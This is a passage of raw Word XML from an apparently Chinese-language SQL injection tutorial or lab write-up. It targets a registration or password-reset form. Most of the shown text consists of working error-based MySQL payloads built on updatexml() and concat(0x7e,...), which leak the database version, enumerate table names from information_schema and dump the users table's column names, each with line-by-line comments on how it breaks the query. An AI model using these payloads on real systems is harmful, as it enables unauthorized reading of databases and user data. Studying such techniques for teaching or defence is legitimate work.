                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>SELECT * FROM users WHERE username='</w:t>
            </w:r>
            <w:r w:rsidR="001F3936">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' or updatexml(1,concat(0x7e,(version())),0)#...'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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>逐行注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 1. SELECT * FROM users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>表的所有字段；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 2. WHERE username='</w:t>
            </w:r>
            <w:r w:rsidR="001F3936">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' or updatexml(1,concat(0x7e,(versi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>on())),0)#...'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：查询条件，</w:t>
            </w:r>
            <w:r w:rsidR="001F3936">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>闭合单引号，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>连接报错语句，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释后续内容（如原本的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>AND email='test@test.com'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>）；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-- 3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>最终等价于：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SELECT * FROM users WHERE username='</w:t>
            </w:r>
            <w:r w:rsidR="00BE53EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:bookmarkStart w:id="6" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="6"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' or updatexml(1,concat(0x7e,(version())),0)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，触发报错并回显数据库版本号，实现注入。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F6C0D92" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="heading_6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：进阶报错注入（无回显时使用）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="64884F08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若找回密码页面未直接回显</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>密码，可修改注册用户名，使用报错注入获取数据库完整数据，</w:t>
      </w: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及逐行注释如下：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7220A3" w14:paraId="76011EA0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E66C564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sql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 xml:space="preserve">-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注册用户名（替换原有</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，适配</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A' or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>格式）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>A' or updatexml(1,concat(0x7e,(version())),0)#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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>逐行注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 1. A'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>为任意前缀，单引号闭合</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>查询条件的单引号；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 2. or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：逻辑或，无需依赖任何已有用户，确保后续报错语句必执行；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 3. updatexml()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>内置函数，用于修改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>XML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>文档，此处用于触发报错（函数参数不合法时会报错并回显指定内容）；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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4. 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>updatexml()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的第一个参数（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>XML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>文档标识，无实际意义，填</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>即可）；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 5. concat(0x7e,(version()),0x7e)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：拼接内容，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0x7e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>~</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>进制编码（用于区分回显内容），</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>version()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>获取数据库版本号；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 6. 0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>updatexml()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的第三个参数（无实际意义，填</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>均可）；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 7. #</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：注释后续内容，避免语法报错；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-- 8. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>作用：触发</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>报错，直接回显数据库版本号，无需额外构造条件，注入更简洁。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E329C92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进阶</w:t>
      </w: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（爆表名、爆数据，逐行注释）：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7220A3" w14:paraId="25F5DBED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0E0021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lastRenderedPageBreak/>
              <w:t>sql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 xml:space="preserve">-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>爆表名（注册用户名，适配</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A' or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>格式）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>A' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A' or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>确保语句必执行；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>group_concat(table_name)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：查询当前数据库下所有表名并拼接；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>inform</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ation_schema.tables</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>系统表，存储所有表信息；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>table_schema=database()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：筛选当前数据库的表；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>updatexml()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>触发报错回显结果。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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>爆</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>表字段名（注册用户名，适配</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A' or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>格式）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>A' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>able_name=0x7573657273),0x7e),0)#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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A' or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>确保语句必执行；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0x7573657273</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
            <w:r>
